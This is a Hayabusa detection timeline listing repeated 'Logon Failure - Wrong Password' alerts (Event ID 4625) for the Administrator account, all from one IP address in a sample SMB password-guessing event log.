01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQ8Zu7ByLWddD4Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: paQzUptV8scmJvsG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQLsoIX9LPvbockz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRYbdVMbUlqFK8oM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OSO730O1fxDL4DfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wmniv339HLGKB4u : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rO3mxvgSES0lVN34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fvK9k9tnCq5hwBqe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujFfMT6I6L8OHag9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWKY2Wh21sePUR1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6E6yf8D5cPOEwR0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpFho8k52BkBlg4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucDvfSfDYZzjNWFS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vnq3S0gEE98xfYLv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seVfaEdAS6lEXgkG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz8BQAlyYXB61tx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkHLs6yikRWVjj9F : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bQUcnUBCmE81G6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BceDCcXoHJQv9pDi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCCLt49g8wmAMEyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pM6C8KRcxVIUsZrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fw5DU6l3QRVl9cWY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37UthbuO3m4Lr7dU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: URB7Ji5pQleLtvy4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: orP9OgiBrYIKZPXE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZwvdnlIWhqoDg8On : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v6dXVbmLBpXc39ah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Mu7amiHAg0l7bza : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JdG6F697kAXFDx9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jY5AAnfQMH3VZQUa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVep4j7jZZAOAQAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KWWtGIQx8jBgAeoH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zn8X8gen8gX9i3QK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9OdUM99RBHzwgVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJbBVm6wDrqyQmpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAVRBfMxIyrfsEtR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wuCIClZihRxRyjGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxhpEP6nnmihvkHB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1HYmJDrWmKjj8DF : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V81dIfR2SRNDk3a2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vaZpLaxB1kcCXqHP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRhs8IoV6R6vyCdL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wUYds3Ym3G2abrV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmBfxm6pPLlSEsUI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VbAuqFggx0zz5iEn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cytpVOjb4KrNaGg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BFFFt7eFzmlzbHhG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJQBZZiNKVGXzx4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gyu6EyrtbyowTfC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aASpkRuPfE8Nl64n : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MSI2b7LpZpWO3xJW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avNkOq3fsGN3yYJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wnlgy6dW33tRk6UX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: msJ8QrqMluTeUlM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H33NuKduMuskxL0D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BHjp69CD1ttbaK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uxByLPApvfeIhU2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6g0WOAnoGpKyEyzW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P8MTs4Nkbm3ryqcp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Nyd7tr3y0BHmPLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J5KiDQOEnDf6xEPN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3MBP1buuRcBRiQTG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXdcg3MSqnGSvax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kej7zgIDCNR5tnnp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM8SOeQXwytB6iw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XPNATM0IL05vtbZ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H56ci5gbBVzebS2j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6rRofLg1uxrojU7n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MAhtwTU8OttAhcxf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CwKgAR6OWbkFlxUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lNZR4G0DVsXVg4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZG99tl0RRN3cQoK : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nwRzAutxa07Y1xE4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OwhvrVBSRa8RcCKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bLBwBys2favoK7BQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.335 